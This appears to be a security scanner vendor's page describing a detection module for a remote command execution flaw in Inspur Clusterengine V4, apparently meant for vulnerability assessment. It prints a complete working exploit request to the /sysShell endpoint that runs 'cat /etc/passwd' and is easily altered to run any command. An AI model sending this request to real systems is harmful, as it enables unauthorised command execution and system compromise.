Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Inspur Clusterengine V4 SYSshell - Remote Command Execution

By kannthu

Critical
Vidoc logoVidoc Module
#inspur#clusterengine#rce
Description

What is "Inspur Clusterengine V4 SYSshell - Remote Command Execution?"

The "Inspur Clusterengine V4 SYSshell - Remote Command Execution" module is designed to detect a vulnerability in the Inspur Clusterengine V4 SYSshell software. This vulnerability allows remote command execution, posing a critical security risk. The module targets systems running the Inspur Clusterengine V4 SYSshell software and checks for the presence of a specific vulnerability.

Impact

If successfully exploited, this vulnerability can allow an attacker to execute arbitrary commands on the target system. This can lead to unauthorized access, data theft, system compromise, and potential disruption of critical services.

How the module works?

The module sends a POST request to the target system's "/sysShell" endpoint with specific parameters. It checks for two matching conditions to determine if the vulnerability is present:

    - The response body must contain the string "root:.*:0:0:", indicating the presence of the root user in the "/etc/passwd" file. - The response status code must be 200, indicating a successful request.

If both conditions are met, the module reports the vulnerability, indicating that the target system is vulnerable to remote command execution.

Example HTTP request:

POST /sysShell HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: lang=cn

op=doPlease&node=cu01&command=cat+/etc/passwd

Note: Replace <Hostname> with the actual hostname of the target system.

It is crucial to address this vulnerability promptly by applying the necessary patches or updates provided by the software vendor. Regular security assessments and monitoring can help detect and mitigate such vulnerabilities before they are exploited.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
regex: root:.*:0:0:and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability